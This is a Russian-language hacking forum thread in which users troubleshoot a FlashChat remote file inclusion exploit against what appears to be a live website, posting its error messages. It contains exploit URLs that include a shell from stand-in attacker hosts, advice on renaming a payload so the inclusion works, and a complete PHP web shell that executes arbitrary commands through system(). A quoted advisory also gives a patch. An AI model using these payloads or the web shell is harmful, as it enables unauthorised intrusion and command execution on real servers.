• XSS.stack #1 – первый литературный журнал от юзеров форума

Хелп скореи

Lomerok

RAID-массив
Пользователь
Регистрация
31.08.2006
Сообщения
92
Реакции
0
Sploit :

##Night_Warrior<Kurdish Hacker>
##night_warrior-[at]hotmail.com
##FlashChat Remote File Include Vulnerability
##Contact : night_warrior-[at]hotmail.com
##hompage :
##vuln code :
aedating4CMS.php line 13 and 14


require_once( "$dir[inc]db.inc.php" );
require_once( "$dir[inc]admin.inc.php" );


http://www.example.com/[Script Path]/inc/cmses/aedating4CMS.php?dir[inc]=http://atacker.com/shell.txt?

# milw0rm.com [2006-09-03]

Ответ на него :

Warning: main(/home/muzxnet/public_html/inc/header.inc.php): failed to open stream: No such file or directory in /home/muzxnet/public_html/chat/inc/cmses/aedating4CMS.php on line 12

Warning: main(/home/muzxnet/public_html/inc/header.inc.php): failed to open stream: No such file or directory in /home/muzxnet/public_html/chat/inc/cmses/aedating4CMS.php on line 12

Warning: main(): Failed opening '/home/muzxnet/public_html/inc/header.inc.php' for inclusion (include_path='.:/usr/lib/php:/usr/local/lib/php') in /home/muzxnet/public_html/chat/inc/cmses/aedating4CMS.php on line 12

Warning: main(db.inc.php): failed to open stream: No such file or directory in /home/muzxnet/public_html/chat/inc/cmses/aedating4CMS.php on line 13

Fatal error: main(): Failed opening required 'db.inc.php' (include_path='.:/usr/lib/php:/usr/local/lib/php') in /home/muzxnet/public_html/chat/inc/cmses/aedating4CMS.php on line 13

чо тетак делоыу ?
ps : сплоит сунукл вотaк /inc/cmses/aedating4CMS.php?dir[inc]=http://lomerok.nm.ru/pipec.php
 
хм , похоже что более ранния , но что факт фаил на серваке есть и уязвимы по идее версии чуть ниже , если ета 4.5.7 у мну 4.5.6 , счс сливаю буду тестить ...
ПС : посмотрел даж видео , всё поидее должно роботать , хс почему нероботоит ... кому видео интересно , прошу сюды :

http://milw0rm.com/exploits/2293
 
Мде , тоже самое и в 4.5.6 толко чо он нехочет робототь сцуко :(

вот код :

$aed_root_path = realpath(dirname(__FILE__) . '/../../../') . '/';
include($aed_root_path . 'inc/header.inc.php');
require_once( "$dir[inc]db.inc.php" );
require_once( "$dir[inc]admin.inc.php" );
 
Тема перемещена из раздела Хакерство в раздел Уязвимости и Эксплоиты.

Lomerok

В следующий раз при создании темы читай правила раздела! При повторном нарушении - минус.
 
Код:
require_once( "$dir[inc]db.inc.php" );
Т.е надо юзать так:
Код:
/inc/cmses/aedating4CMS.php?dir[inc]=http://lomerok.nm.ru/
Файл pipec.php переименовать в db.inc.php
:punk:
 
Гы тестил это и вот на втором чё выдало:
Код:
Patched By The_Sniper
 
to Great : "большо" посибо . еси есть чучуть побольше то ложи его , желательно с граф интерфеисом : чтоб внутри было окошко для ввода команд и окошко где показан результат . вот .

to xhost : мде , я толко один поимел , остольные с багом етим ломаыуцо кк ... :(
 
Вобшчем вот : тут и ешчё один фаил бжный оказалсе и решение нашлось , кому нуно патчитесь ...

Here are 3 RFI vulnerabilities in Flashchat i've found:

Code:
http://site.com/[script_path]/inc/cmses/aedating4CMS.php?dir[inc]=http://evil.com/shell.txt?
http://site.com/[script_path]/inc/cmses/aedatingCMS2.php?dir[inc]=http://evil.com/shell.txt?
http://site.com/[script_path]/inc/cmses/aedatingCMS.php?dir[inc]=http://evil.com/shell.txt?

video here:

Code:
http://rapidshare.de/files/31362430/Flashchat.rar.html


EDIT: Solution:


It looks like the vulnerable files are there in case you want to integrate with another script. The script that would require these files is AEDating:

you simply delete the following files and you will be secure:

/inc/cmses/aedating4CMS.php
/inc/cmses/aedatingCMS.php
/inc/cmses/aedatingCMS2.php

if your flashchat is integrated with AEDating and/or you dont want to delete the files you can just edit the 3 files to use your path like this:

Replace this:

$aed_root_path = realpath(dirname(__FILE__) . '/../../../') . '/';
include($aed_root_path . 'inc/header.inc.php');
require_once( "$dir[inc]db.inc.php" );
require_once( "$dir[inc]admin.inc.php" );

With this:

$aed_root_path = realpath(dirname(__FILE__) . '/../../../') . '/';
include($aed_root_path . 'inc/header.inc.php');
require_once( "[Your AED path]/db.inc.php" );
require_once( "[Your AED path]/admin.inc.php" );

Alternatively you could just upgrade to 4.6.2 (just released)

PS, all 3 of those files are vulnerable and will need editing.

# milw0rm.com [2006-09-04]
 
to Great : "большо" посибо . еси есть чучуть побольше то ложи его , желательно с граф интерфеисом : чтоб внутри было окошко для ввода команд и окошко где показан результат . вот .
Код:
<form method='post'>
<table border=0>
<tr><td>Command:<td><input type='text' value='<?=$_POST['cmd'];?>' size=100 name='cmd'>
<tr><td>Grab STDERR:<td><input type='checkbox' name='graberr'<?php if($_POST['graberr']=='on') echo " checked"; ?>>
<tr><td><input type='submit' name='go' value='Exec'><td><input type='reset' value='Reset'>
</table></form>
<?php
if(isset($_POST['go']))
{
  if($_POST['graberr'] == "on")
    $_POST['cmd'] .= " 2>&1";
  echo "<hr>Executing command '$_POST[cmd]'".(($_POST['graberr']=='on')?" with STDERR grabbed":"").":
<textarea cols=150 rows=40 readonly>";
  system($_POST['cmd']);
  echo "</textarea>";
}
?>
 
to xhost : маленький шо песдетс ... собсно зачем он мне нужен , затем что на некоторых саитах стоит таимаут на выполнение кода , а когда он грузица с другого сервака ето бывает долго ...
 


Напишите ответ...
  • Вставить:
Прикрепить файлы
Верх